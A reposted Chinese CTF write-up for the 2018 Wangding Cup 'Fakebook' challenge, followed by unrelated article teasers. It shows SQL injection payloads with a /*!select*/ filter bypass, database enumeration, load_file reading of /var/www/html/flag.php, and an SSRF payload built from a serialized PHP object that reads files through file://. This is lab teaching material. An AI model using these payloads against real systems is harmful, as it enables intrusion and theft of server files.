[网鼎杯 2018]Fakebook

news2024/12/23 22:53:07

目录

信息收集

代码审计

思路

解法一(非预期解)

解法二(预期解)


信息收集

目录扫描+代码泄露扫描

robots.txt;flag.php;login.php;user.php;view.php;join.php;

直接打开flag.php后没有回显,应该需要通过ssrf来访问 

在robots.txt发现user.php.bak

打开user.php.bak下载到一份源码

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

代码审计

     $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;

初始化一个新的会话,返回一个cURL句柄,设置会话的url和返回方式为1(字符串文件返回,0则是输出到屏幕),执行ch然后判断响应码并返回执行的结果。

<?php
// 创建一个新cURL资源
$ch = curl_init();

// 设置URL和相应的选项
curl_setopt($ch, CURLOPT_URL, "url");
curl_setopt($ch, CURLOPT_HEADER, 0/1);

// 抓取URL并把它传递给浏览器
curl_exec($ch);

// 关闭cURL资源,并且释放系统资源
curl_close($ch);
?>

思路

可以看到admin可以打开,打开后发现url里面有参数no,尝试注入:

  • order by 5

报错,可以判断字段数为4。

  • ?no=1 union select 1,2,3,4#

分别尝试union 和 select均没有被过滤,猜测应该是一起出现时才被过滤

内联注释绕过

内联注释就是把一些特有的仅在MYSQL上的语句放在 /*!...*/ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行。别和注释/*... */搞混了。

  • ?no=-1 union /*!select*/ 1,2,3,4#

注入点为2

  • ?no=-1 union /*!select*/ 1,database(),3,4#

  • ?no=-1 union /*!select*/ 1,user(),3,4# 

是root权限哇 

  • ?no=-1 union /*!select*/ 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#

  • ?no=-1 union /*!select*/ 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#

no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

查看data表

  • ?no=-1 union /*!select*/ 1,group_concat('--',data,'--'),3,4 from fakebook.users#

--O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:13;s:4:"blog";s:12:"www.123qq.cn";}--

是个序列化后的UserInfo对象

解法一(非预期解)

在MySQL中,LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。

我们发现是root权限,load_file()函数可以利用绝对路径去加载一个文件,于是我们利用一下load_file(file_name):file_name是绝对路径,于是我们直接用var/www/html/flag.php路径去访问一下这个文件

  • ?no=-1 union /*!select*/ 1,load_file("/var/www/html/flag.php"),3,4#

查看源码拿到flag 

 

  • 利用条件

1、必须有权限读取并且文件必须完全可读。

2、欲读取文件必须在服务器上

3、必须指定文件完整的路径

4、欲读取文件必须小于max_allowed_packet

如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限。
在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到administrators才能访问的文件,
users就不能实现用load_file读取文件了。

 

解法二(预期解)

利用ssrf漏洞

可以看到data中存的是序列化数据,我们可以构造并传入序列化内容尝试利用ssrf漏洞读取flag.php。

因为只有在blog才有获取内容的入口和出口,我们尝试在blog(第四列)进行序列化字符串的注入

 public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
 function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

poc

<?php
class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
}
$a = new UserInfo();
echo serialize($a);
?>

构造payload为:

  • ?no=-1 union /*!select*/ 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

解码后得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/183323.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Qt音视频开发12-easyplayer内核

一、前言 在视频监控行业经常看到两个厂家广告打得比较厉害&#xff0c;一个是青犀视频对应easyplayer&#xff0c;一个是大牛直播&#xff0c;两个最初都是sdk免费&#xff0c;并提供调用示例源码&#xff0c;后面大牛直播的sdk以及示例都无法运行&#xff0c;目前就剩下免费…

Word处理控件Aspose.Words功能演示:如何在 C# .NET 中将 PNG、JPG 转换为 Word

Aspose.Words 是一种高级Word文档处理API&#xff0c;用于执行各种文档管理和操作任务。API支持生成&#xff0c;修改&#xff0c;转换&#xff0c;呈现和打印文档&#xff0c;而无需在跨平台应用程序中直接使用Microsoft Word。此外&#xff0c; Aspose API支持流行文件格式处…

git push clone 参数具体解析

1 问题背景 git远程仓库有很多命令&#xff0c;但是教程里面讲解的都是特别模糊的。 2 命令实例解析 2.1 git branch -vv -a命令具体解析 在开始下面的命令解析之前&#xff0c;我们一定要学会git branch -vv -a这个命令&#xff0c;这个是查询本地仓库远程仓库跟踪关系最全…

《从0开始学大数据》之ZooKeeper是如何保证数据一致性的

背景 在分布式集群系统中&#xff0c;比如两个应用程序都需要对一个文件路径进行写操作&#xff0c;但是如果两个应用程序对于哪台服务器是主服务器的判断不同&#xff0c;就会分别连接到两个不同的 NameNode 上&#xff0c;并都得到了对同一个文件路径的写操作权限&#xff0…

振弦采集模块配置工具VMTool 扩展功能指令生成器与实时曲线

振弦采集模块配置工具VMTool 扩展功能指令生成器与实时曲线 指令生成器 &#xff08; 1&#xff09; 指令生成 指令生成器可根据需要生成符合 MODBUS 和 AABB 通讯协议的读取和控制指令。 通过点击串口调试工具内的【 指令生成器】 按钮&#xff0c;可打开指令生成器窗口&#…

【SpringBoot高级篇】SpringBoot集成XXL-JOB分布式任务调度平台

【SpringBoot高级篇】SpringBoot集成XXL-JOB分布式任务调度平台简介下载源码部署任务调度平台执行SQL脚本部署任务平台简单使用初始化测试项目pom依赖SampleXxlJob修改配置调度平台配置执行器任务管理添加任务简介 XXL-JOB是一个分布式任务调度平台&#xff0c;其核心设计目标…

连续函数的运算与初等函数的连续性——“高等数学”

各位CSDN的uu们你们好呀&#xff0c;今天&#xff0c;小雅兰的内容是连续函数的运算与初等函数的连续性&#xff0c;上篇博客我们学到了函数的连续性和间断点&#xff0c;这篇博客相当于是上篇博客的一个补充&#xff0c;好吧&#xff0c;现在就让我们进入高等数学的世界吧 一、…

【刷题】不用加减乘除做加法

这是一道简单的数学题。但是比较繁琐&#xff0c;需要有耐心。 目录 前言 一、找规律 二、怎么实现加法&#xff1f; 总结 前言 这道题不让用四则运算符做加法&#xff0c;于是我第一反应是用位运算。 难道转成二进制再使用位运算吗&#xff0c;显然不需要&#xff0c;列草稿可…

Java 开发环境配置 “JDK”(超详细整理,适合新手入门)

前言 &#x1f4dc; “ 作者 久绊A ” 专注记录自己所整理的Java、web、sql等&#xff0c;IT技术干货、学习经验、面试资料、刷题记录&#xff0c;以及遇到的问题和解决方案&#xff0c;记录自己成长的点滴 目录 前言 一、什么是JDK&#xff1f; 1、大概介绍 2、详细介绍 …

MySQL进阶——触发器

1.触发器定义 同存储过程和函数类似&#xff0c;MySQL中的触发器也是存储在系统内部的一段程序代码&#xff0c;可以把它看作是一个特殊的存储过程。所不同的是&#xff0c;触发器无需人工调用&#xff0c;当程序满足定义条件时就会被MySQL自动调用。这些条件可以称为触发事件…

Weapp影视评分项目开发(04):三方组件的使用

知识点 三方组件库的安装与使用 computed 的安装与使用 新建代码分支 我们以 master 为基准&#xff0c;在 gitee 上新建代码分支 component&#xff0c;并在该分支上进行代码开发。命令如下&#xff1a; git pull // 拉取 component 分支 git checkout component // 切换到…

哪款无线耳机音质好?发烧友推荐四大音质超好的蓝牙耳机

蓝牙耳机因为摆脱了线的束缚&#xff0c;使用起来会更方便&#xff0c;近几年在人们的日常生活中也越来越常见。哪款无线耳机音质好&#xff1f;在此&#xff0c;我来给整理了几款发烧友都在推荐的好音质蓝牙耳机&#xff0c;一起来看看吧。 一、南卡小音舱蓝牙耳机 售价&…

推荐系统之ABTest实验中心

5.3 ABTest实验中心 学习目标 目标 无应用 无 个性化推荐系统、搜索引擎、广告系统&#xff0c;这些系统都需要在线上不断上线&#xff0c;不断优化&#xff0c;优化之后怎么确定是好是坏。这时就需要ABTest来确定&#xff0c;最近想的办法、优化的算法、优化的逻辑数据是正向…

Linux | 人生苦短,我用Vim【最受欢迎的编辑器】

一探顶级编辑器——Vim一、初次见面&#xff0c;你好vim1、vim的基本概念2、IDE与编辑器的区别3、vim中的五种常见模式介绍二、初出茅庐&#xff0c;vim基本操作1、安装vim&#xff0c;进入vim2、vim中的模式切换&#x1f4fa;三、初露锋芒&#xff0c;vim指令集1、&#x1f52…

数据库系统概论——关系代数详解

文章目录1、关系代数概述1.1 传统的集合运算1.2 专门的关系运算1.2.1 选择运算1.2.2 投影&#xff08;Projection&#xff09;1.2.3 连接&#xff08;Join&#xff09;1.2.4 两类常用连接运算1.2.5 除&#xff08;Division&#xff09;1、关系代数概述 关系代数是一种抽象的查…

虹科分享 | 虹科智能自动化2022文章精选

虹科智能自动化事业部一直围绕着工业自动化、能源管理与楼宇自动化三大方向&#xff0c;为客户提供最满意的技术服务和最适合的解决方案&#xff0c;并结合客户需求、行业发展动向和产品资讯&#xff0c;虹科智能自动化团队为大家带来了丰富的技术文章和应用案例。温故而知新&a…

【SpringCloud复习巩固】Nacos

Nacos 链接&#xff1a;https://pan.baidu.com/s/1Ct6upj-kpLuVwyNpk_3KMw 提取码&#xff1a;yyac 目录 一.Nacos 1.1认识Nacos 1.2安装Nacos 1.2.1下载安装包 1.2.2解压到任意非中文目录 1.2.3介绍 1.2.4启动 1.2.5访问 1.3服务注册到Nacos 1.3.1在cloud-demo父工程…

APP漏洞挖掘(二)同开发商的多款APP存在通用漏洞

0x01 前言 测某一APP时&#xff0c;根据信息收集测试&#xff0c;发现APP的后台系统存在SQL注入、XSS、弱口令、信息泄漏等漏洞&#xff0c;此APP本身存在逻辑漏洞与SQL注入漏洞&#xff0c;再通过观察酷传搜索的结果发现此APP开发商开发了三十几个APP&#xff0c;猜测可能存在…

Vue笔记01 模板语法,数据代理,事件处理,计算监听属性,绑定样式,列表渲染

基本使用 引入vue 创建vue实例并关联容器 一个Vue实例只应对应一个容器 一个Vue实例可以有多个组件 模板语法 使用Vue实例中数据 root容器中代码被称为vue模板 语法分为插值语法和指令(v-xxx) 插值语法 绑定标签体内容 {{}}中的可以是js表达式&#xff08;特殊的js代码&…

手把手带你调参Yolo v5(一)

来源&#xff1a;投稿 作者&#xff1a;王同学 编辑&#xff1a;学姐 YOLO系列模型在目标检测领域有着十分重要的地位&#xff0c;随着版本不停的迭代&#xff0c;模型的性能在不断地提升&#xff0c;源码提供的功能也越来越多&#xff0c;那么如何使用源码就显得十分的重要&am…